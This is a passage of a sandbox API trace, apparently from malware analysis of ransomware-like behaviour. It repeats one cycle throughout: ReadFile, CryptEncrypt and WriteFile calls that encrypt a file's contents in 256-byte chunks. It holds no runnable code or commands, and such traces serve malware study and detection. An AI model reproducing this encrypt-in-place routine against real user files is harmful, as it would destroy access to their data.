lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.450] GetLastError () returned 0x0 [0153.450] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.450] GetLastError () returned 0x0 [0153.450] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.450] GetLastError () returned 0x0 [0153.450] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.450] GetLastError () returned 0x0 [0153.450] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.450] GetLastError () returned 0x0 [0153.450] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.451] GetLastError () returned 0x0 [0153.451] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.451] GetLastError () returned 0x0 [0153.451] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.451] GetLastError () returned 0x0 [0153.451] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.451] GetLastError () returned 0x0 [0153.451] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.451] GetLastError () returned 0x0 [0153.451] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.452] GetLastError () returned 0x0 [0153.452] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.453] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.453] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.453] GetLastError () returned 0x0 [0153.453] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.454] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.454] GetLastError () returned 0x0 [0153.454] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.454] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.454] GetLastError () returned 0x0 [0153.454] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.454] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.454] GetLastError () returned 0x0 [0153.454] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.454] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.454] GetLastError () returned 0x0 [0153.454] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: 